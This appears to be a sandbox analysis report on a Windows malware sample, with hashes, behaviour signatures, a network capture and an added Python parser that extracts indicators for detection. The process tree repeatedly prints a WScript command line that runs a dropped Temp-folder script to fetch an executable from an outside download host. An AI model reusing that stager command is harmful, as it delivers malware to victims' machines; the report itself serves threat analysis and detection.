Analysis

  • max time kernel
    134s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20240508-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    31/05/2024, 09:51 UTC

General

  • Target

    8695849edc287a9761aea3bab6a6feb1_JaffaCakes118.exe

  • Size

    184KB

  • MD5

    8695849edc287a9761aea3bab6a6feb1

  • SHA1

    83bab866fb8ad5bc85e3024133799ff6d45add46

  • SHA256

    91a34986c15dc37ac33b15e677f21940d992cf2c31b5af85d9ead18b251ef8a0

  • SHA512

    ddb6ccf813f7d7a7f888417569c3fe5e4953ba832b1581231c5016062859292fe4d7c3faf9d98dd0c8987fe2c43c45501c7740ff80404b21d4286cafe30479b2

  • SSDEEP

    3072:/MzsU0S0w8Hp9Rc/LB+dJGESR4hIRSYaVvb1NVFJNndnO3r:/7BSH8zUB+nGESaaRvoB7FJNndnO

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 5 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Command and Scripting Interpreter: JavaScript 1 TTPs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry class 1 IoCs
  • Suspicious use of WriteProcessMemory 15 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\8695849edc287a9761aea3bab6a6feb1_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\8695849edc287a9761aea3bab6a6feb1_JaffaCakes118.exe"
    1⤵
    • Checks computer location settings
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:2236
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf4314.js" http://www.djapp.info/?domain=gFGYbUEsPC.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf4314.exe
      2⤵
      • Blocklisted process makes network request
      PID:1588
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf4314.js" http://www.djapp.info/?domain=gFGYbUEsPC.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf4314.exe
      2⤵
      • Blocklisted process makes network request
      PID:4576
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf4314.js" http://www.djapp.info/?domain=gFGYbUEsPC.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf4314.exe
      2⤵
      • Blocklisted process makes network request
      PID:3532
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf4314.js" http://www.djapp.info/?domain=gFGYbUEsPC.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf4314.exe
      2⤵
      • Blocklisted process makes network request
      PID:3152
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf4314.js" http://www.djapp.info/?domain=gFGYbUEsPC.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf4314.exe
      2⤵
      • Blocklisted process makes network request
      PID:4840
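
The five WScript.exe launches above share one command line, and that command line is the most useful artefact in the tree: the parent drops a script into the user's Temp directory, passes the stage-2 URL (with affiliate-style pub_id/setup_id parameters) as the first script argument and the path for the downloaded executable as the second. The parser below was written for this report; it is not code from the sample or from Triage. It pulls those fields out and flags the launch characteristics a detection rule would key on. The command line is copied from the tree; the indicator names and the Temp-path marker are this example's own. Note that the recorded image is C:\Windows\SysWOW64\WScript.exe although the command line names System32: the 32-bit parent is subject to file-system redirection, which also explains the WOW64 token in the User-Agent seen later in the Network section.

```python
"""Parse a Windows Script Host launch like the one recorded in this report.

Added example for this report (not the sample's code, not Triage's).
SAMPLE_CMDLINE is copied from the process tree; indicator names are ours.
"""
import re
from urllib.parse import urlsplit, parse_qs

# Command line recorded for PID 1588 (the four later launches are identical).
# The image actually executed was C:\Windows\SysWOW64\WScript.exe: a 32-bit
# parent asking for System32 is redirected by WOW64.
SAMPLE_CMDLINE = (
    r'"C:\Windows\System32\WScript.exe" '
    r'"C:\Users\Admin\AppData\Local\Temp\fuf4314.js" '
    r'http://www.djapp.info/?domain=gFGYbUEsPC.com&dotnet=4&file=installer'
    r'&ip=52.1.45.42:80&pub_id=101&setup_id=300 '
    r'C:\Users\Admin\AppData\Local\Temp\fuf4314.exe'
)

WSH_IMAGES = ("wscript.exe", "cscript.exe")
SCRIPT_EXTS = (".js", ".jse", ".vbs", ".vbe", ".wsf")
TEMP_MARKER = "\\appdata\\local\\temp\\"   # assumed marker for the user's Temp dir


def split_windows_cmdline(cmdline: str) -> list:
    """Tokenise a Windows command line: a double-quoted token keeps its spaces,
    anything else ends at whitespace. shlex is avoided because it treats
    backslashes as escapes in POSIX mode."""
    return [quoted or bare
            for quoted, bare in re.findall(r'"([^"]*)"|(\S+)', cmdline)]


def parse_wscript_cmdline(cmdline: str) -> dict:
    """Return image, script, stage-2 URL (host + query parameters), drop path
    and a list of indicator labels for a WScript/CScript command line."""
    tokens = split_windows_cmdline(cmdline)
    if not tokens or not tokens[0].lower().endswith(WSH_IMAGES):
        raise ValueError("not a Windows Script Host command line")
    image = tokens[0]
    script = tokens[1] if len(tokens) > 1 else ""
    download, drop_path = None, None
    for arg in tokens[2:]:
        low = arg.lower()
        if low.startswith(("http://", "https://")):
            parts = urlsplit(arg)
            download = {
                "url": arg,
                "host": parts.hostname,
                # first value of each query key: domain, dotnet, file, ip, pub_id, setup_id
                "params": {k: v[0] for k, v in parse_qs(parts.query).items()},
            }
        elif low.endswith(".exe"):
            drop_path = arg

    indicators = []
    if script.lower().endswith(SCRIPT_EXTS):
        indicators.append("wsh_script_argument")
    if TEMP_MARKER in script.lower():
        indicators.append("script_in_user_temp")
    if download is not None:
        indicators.append("url_passed_on_cmdline")
    if drop_path and TEMP_MARKER in drop_path.lower():
        indicators.append("exe_drop_path_in_user_temp")

    return {"image": image, "script": script, "download": download,
            "drop_path": drop_path, "indicators": indicators}


if __name__ == "__main__":
    import json
    print(json.dumps(parse_wscript_cmdline(SAMPLE_CMDLINE), indent=2))
```

On this run all four indicators fire. For a process-creation rule, the combination of a WSH image, a script under the user's Temp directory and an http(s) URL on the command line is the part worth alerting on; the .exe drop path is a bonus that tells you which file to pull from the sandbox if the download ever succeeds.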

Network

  • country: US
    DNS
    8.8.8.8.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    8.8.8.8.in-addr.arpa
    IN PTR
    Response
    8.8.8.8.in-addr.arpa
    IN PTR
    dns.google
  • country: US
    DNS
    www.djapp.info
    WScript.exe
    Remote address:
    8.8.8.8:53
    Request
    www.djapp.info
    IN A
    Response
  • country: US
    DNS
    bi.downthat.com
    WScript.exe
    Remote address:
    8.8.8.8:53
    Request
    bi.downthat.com
    IN A
    Response
    bi.downthat.com
    IN CNAME
    traff-2.hugedomains.com
    traff-2.hugedomains.com
    IN CNAME
    hdr-nlb5-4e815dd67a14bf7f.elb.us-east-2.amazonaws.com
    hdr-nlb5-4e815dd67a14bf7f.elb.us-east-2.amazonaws.com
    IN A
    3.130.253.23
    hdr-nlb5-4e815dd67a14bf7f.elb.us-east-2.amazonaws.com
    IN A
    3.130.204.160
  • country: US
    GET
    http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=
    WScript.exe
    Remote address:
    3.130.253.23:80
    Request
    GET /?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl= HTTP/1.1
    Accept: */*
    Accept-Language: en-us
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Host: bi.downthat.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 302 Found
    content-length: 0
    date: Fri, 31 May 2024 09:51:14 GMT
    location: https://www.hugedomains.com/domain_profile.cfm?d=downthat.com
  • country: US
    DNS
    www.hugedomains.com
    WScript.exe
    Remote address:
    8.8.8.8:53
    Request
    www.hugedomains.com
    IN A
    Response
    www.hugedomains.com
    IN A
    172.67.70.191
    www.hugedomains.com
    IN A
    104.26.7.37
    www.hugedomains.com
    IN A
    104.26.6.37
  • country: US
    DNS
    228.249.119.40.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    228.249.119.40.in-addr.arpa
    IN PTR
    Response
  • country: US
    DNS
    23.253.130.3.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    23.253.130.3.in-addr.arpa
    IN PTR
    Response
    23.253.130.3.in-addr.arpa
    IN PTR
    ec2-3-130-253-23.us-east-2.compute.amazonaws.com
  • country: US
    DNS
    g.bing.com
    Remote address:
    8.8.8.8:53
    Request
    g.bing.com
    IN A
    Response
    g.bing.com
    IN CNAME
    g-bing-com.dual-a-0034.a-msedge.net
    g-bing-com.dual-a-0034.a-msedge.net
    IN CNAME
    dual-a-0034.a-msedge.net
    dual-a-0034.a-msedge.net
    IN A
    204.79.197.237
    dual-a-0034.a-msedge.net
    IN A
    13.107.21.237
  • country: US
    GET
    https://g.bing.com/neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8PZ6cjwQfSFJGxnYodZemIDVUCUxZCbPi6AaTzTMqEjT0Dy1ZzsRdJwPC-a2Gb10sCa-jfoRAmtseQuSr9hnalRBqmK0P9-YXbb3Psqt8pXyE8Zw4_qIgTX7-KNhAU_41DdkKMx1MsYFXKwc5qY99-CvoW2NES06IfoyJJm4Tv08HSYiG%26u%3DbXN4Ym94JTNhJTJmJTJmZ2FtZSUyZiUzZnByb2R1Y3RJZCUzZDlOMEg2MktaM0JYViUyNm9jaWQlM2RpbnBfcm1jX3hib19zdGFydF9UUHRpdGxlX2VuZ2FnZQ%26rlid%3D4c04917e5fbc1b2cebd5f7453f246663&TIME=20240508T112332Z&CID=530628298&EID=530628298&tids=15000&adUnitId=11730597&localId=w:F93159F4-8ABC-3E2B-DF73-50B998F17BEB&deviceId=6825829378917981&muid=F93159F48ABC3E2BDF7350B998F17BEB
    Remote address:
    204.79.197.237:443
    Request
    GET /neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8PZ6cjwQfSFJGxnYodZemIDVUCUxZCbPi6AaTzTMqEjT0Dy1ZzsRdJwPC-a2Gb10sCa-jfoRAmtseQuSr9hnalRBqmK0P9-YXbb3Psqt8pXyE8Zw4_qIgTX7-KNhAU_41DdkKMx1MsYFXKwc5qY99-CvoW2NES06IfoyJJm4Tv08HSYiG%26u%3DbXN4Ym94JTNhJTJmJTJmZ2FtZSUyZiUzZnByb2R1Y3RJZCUzZDlOMEg2MktaM0JYViUyNm9jaWQlM2RpbnBfcm1jX3hib19zdGFydF9UUHRpdGxlX2VuZ2FnZQ%26rlid%3D4c04917e5fbc1b2cebd5f7453f246663&TIME=20240508T112332Z&CID=530628298&EID=530628298&tids=15000&adUnitId=11730597&localId=w:F93159F4-8ABC-3E2B-DF73-50B998F17BEB&deviceId=6825829378917981&muid=F93159F48ABC3E2BDF7350B998F17BEB HTTP/2.0
    host: g.bing.com
    accept-encoding: gzip, deflate
    user-agent: WindowsShellClient/9.0.40929.0 (Windows)
    Response
    HTTP/2.0 204
    cache-control: no-cache, must-revalidate
    pragma: no-cache
    expires: Fri, 01 Jan 1990 00:00:00 GMT
    set-cookie: MUID=1B834AF31E2D69D531A45E631F9668C3; domain=.bing.com; expires=Wed, 25-Jun-2025 09:51:15 GMT; path=/; SameSite=None; Secure; Priority=High;
    strict-transport-security: max-age=31536000; includeSubDomains; preload
    access-control-allow-origin: *
    x-cache: CONFIG_NOCACHE
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: 89EF9A2B745D40058026FF2F5CFC4C20 Ref B: LON04EDGE0908 Ref C: 2024-05-31T09:51:15Z
    date: Fri, 31 May 2024 09:51:15 GMT
  • country: US
    GET
    https://g.bing.com/neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8PZ6cjwQfSFJGxnYodZemIDVUCUxZCbPi6AaTzTMqEjT0Dy1ZzsRdJwPC-a2Gb10sCa-jfoRAmtseQuSr9hnalRBqmK0P9-YXbb3Psqt8pXyE8Zw4_qIgTX7-KNhAU_41DdkKMx1MsYFXKwc5qY99-CvoW2NES06IfoyJJm4Tv08HSYiG%26u%3DbXN4Ym94JTNhJTJmJTJmZ2FtZSUyZiUzZnByb2R1Y3RJZCUzZDlOMEg2MktaM0JYViUyNm9jaWQlM2RpbnBfcm1jX3hib19zdGFydF9UUHRpdGxlX2VuZ2FnZQ%26rlid%3D4c04917e5fbc1b2cebd5f7453f246663&TIME=20240508T112332Z&CID=530628298&EID=&tids=15000&adUnitId=11730597&localId=w:F93159F4-8ABC-3E2B-DF73-50B998F17BEB&deviceId=6825829378917981&muid=F93159F48ABC3E2BDF7350B998F17BEB
    Remote address:
    204.79.197.237:443
    Request
    GET /neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8PZ6cjwQfSFJGxnYodZemIDVUCUxZCbPi6AaTzTMqEjT0Dy1ZzsRdJwPC-a2Gb10sCa-jfoRAmtseQuSr9hnalRBqmK0P9-YXbb3Psqt8pXyE8Zw4_qIgTX7-KNhAU_41DdkKMx1MsYFXKwc5qY99-CvoW2NES06IfoyJJm4Tv08HSYiG%26u%3DbXN4Ym94JTNhJTJmJTJmZ2FtZSUyZiUzZnByb2R1Y3RJZCUzZDlOMEg2MktaM0JYViUyNm9jaWQlM2RpbnBfcm1jX3hib19zdGFydF9UUHRpdGxlX2VuZ2FnZQ%26rlid%3D4c04917e5fbc1b2cebd5f7453f246663&TIME=20240508T112332Z&CID=530628298&EID=&tids=15000&adUnitId=11730597&localId=w:F93159F4-8ABC-3E2B-DF73-50B998F17BEB&deviceId=6825829378917981&muid=F93159F48ABC3E2BDF7350B998F17BEB HTTP/2.0
    host: g.bing.com
    accept-encoding: gzip, deflate
    user-agent: WindowsShellClient/9.0.40929.0 (Windows)
    cookie: MUID=1B834AF31E2D69D531A45E631F9668C3; _EDGE_S=SID=12A8F14E1DFE6F0121CAE5DE1C3E6E7E
    Response
    HTTP/2.0 204
    cache-control: no-cache, must-revalidate
    pragma: no-cache
    expires: Fri, 01 Jan 1990 00:00:00 GMT
    set-cookie: MSPTC=DUezu6s2NXx1lXARAQZNY5x5o_X8JvkZfLImOc9eWgY; domain=.bing.com; expires=Wed, 25-Jun-2025 09:51:16 GMT; path=/; Partitioned; secure; SameSite=None
    strict-transport-security: max-age=31536000; includeSubDomains; preload
    access-control-allow-origin: *
    x-cache: CONFIG_NOCACHE
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: E35DA7C48B504048A81B0152C3CCDAD0 Ref B: LON04EDGE0908 Ref C: 2024-05-31T09:51:16Z
    date: Fri, 31 May 2024 09:51:16 GMT
  • country: BE
    GET
    https://www.bing.com/aes/c.gif?RG=16c3a93125b949fd8d962a034bccd1ce&med=10&pubId=251978541&tids=15000&type=mv&reqver=1.0&TIME=20240508T112332Z&adUnitId=11730597&localId=w:F93159F4-8ABC-3E2B-DF73-50B998F17BEB&deviceId=6825829378917981
    Remote address:
    88.221.83.184:443
    Request
    GET /aes/c.gif?RG=16c3a93125b949fd8d962a034bccd1ce&med=10&pubId=251978541&tids=15000&type=mv&reqver=1.0&TIME=20240508T112332Z&adUnitId=11730597&localId=w:F93159F4-8ABC-3E2B-DF73-50B998F17BEB&deviceId=6825829378917981 HTTP/2.0
    host: www.bing.com
    accept-encoding: gzip, deflate
    user-agent: WindowsShellClient/9.0.40929.0 (Windows)
    cookie: MUID=1B834AF31E2D69D531A45E631F9668C3
    Response
    HTTP/2.0 200
    cache-control: private,no-store
    pragma: no-cache
    vary: Origin
    p3p: CP=BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: A1BA0E349F0B455A9638F92E21D83B4C Ref B: DUS30EDGE0417 Ref C: 2024-05-31T09:51:16Z
    content-length: 0
    date: Fri, 31 May 2024 09:51:16 GMT
    set-cookie: _EDGE_S=SID=12A8F14E1DFE6F0121CAE5DE1C3E6E7E; path=/; httponly; domain=bing.com
    set-cookie: MUIDB=1B834AF31E2D69D531A45E631F9668C3; path=/; httponly; expires=Wed, 25-Jun-2025 09:51:16 GMT
    alt-svc: h3=":443"; ma=93600
    x-cdn-traceid: 0.b453dd58.1717149076.7ce5e78
  • country: US
    DNS
    172.210.232.199.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    172.210.232.199.in-addr.arpa
    IN PTR
    Response
  • country: US
    DNS
    72.32.126.40.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    72.32.126.40.in-addr.arpa
    IN PTR
    Response
  • country: BE
    GET
    https://www.bing.com/th?id=OADD2.10239359720591_10PHTLBML42K6TRZO&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=24&h=24&dynsize=1&qlt=90
    Remote address:
    88.221.83.184:443
    Request
    GET /th?id=OADD2.10239359720591_10PHTLBML42K6TRZO&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=24&h=24&dynsize=1&qlt=90 HTTP/2.0
    host: www.bing.com
    accept: */*
    cookie: MUID=1B834AF31E2D69D531A45E631F9668C3; _EDGE_S=SID=12A8F14E1DFE6F0121CAE5DE1C3E6E7E; MSPTC=DUezu6s2NXx1lXARAQZNY5x5o_X8JvkZfLImOc9eWgY; MUIDB=1B834AF31E2D69D531A45E631F9668C3
    accept-encoding: gzip, deflate, br
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
    Response
    HTTP/2.0 200
    cache-control: public, max-age=2592000
    content-type: image/png
    access-control-allow-origin: *
    access-control-allow-headers: *
    access-control-allow-methods: GET, POST, OPTIONS
    timing-allow-origin: *
    report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}&ndcParam=QWthbWFp
    nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
    content-length: 1107
    date: Fri, 31 May 2024 09:51:17 GMT
    alt-svc: h3=":443"; ma=93600
    x-cdn-traceid: 0.b453dd58.1717149077.7ce6296
  • country: US
    DNS
    237.197.79.204.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    237.197.79.204.in-addr.arpa
    IN PTR
    Response
  • country: US
    DNS
    184.83.221.88.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    184.83.221.88.in-addr.arpa
    IN PTR
    Response
    184.83.221.88.in-addr.arpa
    IN PTR
    a88-221-83-184.deploy.static.akamaitechnologies.com
  • country: US
    DNS
    43.58.199.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    43.58.199.20.in-addr.arpa
    IN PTR
    Response
  • country: US
    DNS
    13.86.106.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    13.86.106.20.in-addr.arpa
    IN PTR
    Response
  • country: US
    DNS
    www.djapp.info
    WScript.exe
    Remote address:
    8.8.8.8:53
    Request
    www.djapp.info
    IN A
    Response
  • country: US
    DNS
    www.djapp.info
    WScript.exe
    Remote address:
    8.8.8.8:53
    Request
    www.djapp.info
    IN A
    Response
  • country: US
    GET
    http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=
    WScript.exe
    Remote address:
    3.130.253.23:80
    Request
    GET /?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl= HTTP/1.1
    Accept: */*
    Accept-Language: en-us
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Host: bi.downthat.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 302 Found
    content-length: 0
    date: Fri, 31 May 2024 09:51:28 GMT
    location: https://www.hugedomains.com/domain_profile.cfm?d=downthat.com
  • country: US
    DNS
    www.djapp.info
    WScript.exe
    Remote address:
    8.8.8.8:53
    Request
    www.djapp.info
    IN A
    Response
  • country: US
    GET
    http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=
    WScript.exe
    Remote address:
    3.130.253.23:80
    Request
    GET /?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl= HTTP/1.1
    Accept: */*
    Accept-Language: en-us
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Host: bi.downthat.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 302 Found
    content-length: 0
    date: Fri, 31 May 2024 09:51:39 GMT
    location: https://www.hugedomains.com/domain_profile.cfm?d=downthat.com
  • country: US
    DNS
    86.23.85.13.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    86.23.85.13.in-addr.arpa
    IN PTR
    Response
  • country: US
    DNS
    206.23.85.13.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    206.23.85.13.in-addr.arpa
    IN PTR
    Response
  • country: US
    DNS
    www.djapp.info
    WScript.exe
    Remote address:
    8.8.8.8:53
    Request
    www.djapp.info
    IN A
    Response
  • country: US
    GET
    http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=
    WScript.exe
    Remote address:
    3.130.253.23:80
    Request
    GET /?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl= HTTP/1.1
    Accept: */*
    Accept-Language: en-us
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Host: bi.downthat.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 302 Found
    content-length: 0
    date: Fri, 31 May 2024 09:51:51 GMT
    location: https://www.hugedomains.com/domain_profile.cfm?d=downthat.com
  • country: US
    DNS
    www.djapp.info
    WScript.exe
    Remote address:
    8.8.8.8:53
    Request
    www.djapp.info
    IN A
    Response
  • country: US
    GET
    http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=
    WScript.exe
    Remote address:
    3.130.253.23:80
    Request
    GET /?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl= HTTP/1.1
    Accept: */*
    Accept-Language: en-us
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Host: bi.downthat.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 302 Found
    content-length: 0
    date: Fri, 31 May 2024 09:52:04 GMT
    location: https://www.hugedomains.com/domain_profile.cfm?d=downthat.com
  • country: US
    DNS
    240.197.17.2.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    240.197.17.2.in-addr.arpa
    IN PTR
    Response
    240.197.17.2.in-addr.arpa
    IN PTR
    a2-17-197-240.deploy.static.akamaitechnologies.com
  • country: US
    DNS
    249.197.17.2.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    249.197.17.2.in-addr.arpa
    IN PTR
    Response
    249.197.17.2.in-addr.arpa
    IN PTR
    a2-17-197-249.deploy.static.akamaitechnologies.com
  • country: US
    DNS
    29.243.111.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    29.243.111.52.in-addr.arpa
    IN PTR
    Response
  • country: US
    DNS
    tse1.mm.bing.net
    Remote address:
    8.8.8.8:53
    Request
    tse1.mm.bing.net
    IN A
    Response
    tse1.mm.bing.net
    IN CNAME
    mm-mm.bing.net.trafficmanager.net
    mm-mm.bing.net.trafficmanager.net
    IN CNAME
    dual-a-0001.a-msedge.net
    dual-a-0001.a-msedge.net
    IN A
    204.79.197.200
    dual-a-0001.a-msedge.net
    IN A
    13.107.21.200
  • country: US
    GET
    https://tse1.mm.bing.net/th?id=OADD2.10239360931610_110BPTPDN41GIXK2B&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90
    Remote address:
    204.79.197.200:443
    Request
    GET /th?id=OADD2.10239360931610_110BPTPDN41GIXK2B&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/2.0
    host: tse1.mm.bing.net
    accept: */*
    accept-encoding: gzip, deflate, br
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
    Response
    HTTP/2.0 200
    cache-control: public, max-age=2592000
    content-length: 415458
    content-type: image/jpeg
    x-cache: TCP_HIT
    access-control-allow-origin: *
    access-control-allow-headers: *
    access-control-allow-methods: GET, POST, OPTIONS
    timing-allow-origin: *
    report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
    nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: 0F978301DD44494B80D2BA70EBAC885B Ref B: LON04EDGE0706 Ref C: 2024-05-31T09:52:55Z
    date: Fri, 31 May 2024 09:52:55 GMT
  • country: US
    GET
    https://tse1.mm.bing.net/th?id=OADD2.10239360931609_1JAA48IJSET6WWQHH&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90
    Remote address:
    204.79.197.200:443
    Request
    GET /th?id=OADD2.10239360931609_1JAA48IJSET6WWQHH&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/2.0
    host: tse1.mm.bing.net
    accept: */*
    accept-encoding: gzip, deflate, br
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
    Response
    HTTP/2.0 200
    cache-control: public, max-age=2592000
    content-length: 430689
    content-type: image/jpeg
    x-cache: TCP_HIT
    access-control-allow-origin: *
    access-control-allow-headers: *
    access-control-allow-methods: GET, POST, OPTIONS
    timing-allow-origin: *
    report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
    nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: E597BFFB31274B2B8745657D15644889 Ref B: LON04EDGE0706 Ref C: 2024-05-31T09:52:55Z
    date: Fri, 31 May 2024 09:52:55 GMT
  • country: US
    DNS
    200.197.79.204.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    200.197.79.204.in-addr.arpa
    IN PTR
    Response
    200.197.79.204.in-addr.arpa
    IN PTR
    a-0001.a-msedge.net
  • 3.130.253.23:80
    http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=
    http
    WScript.exe
    691 B
    283 B
    6
    3

    HTTP Request

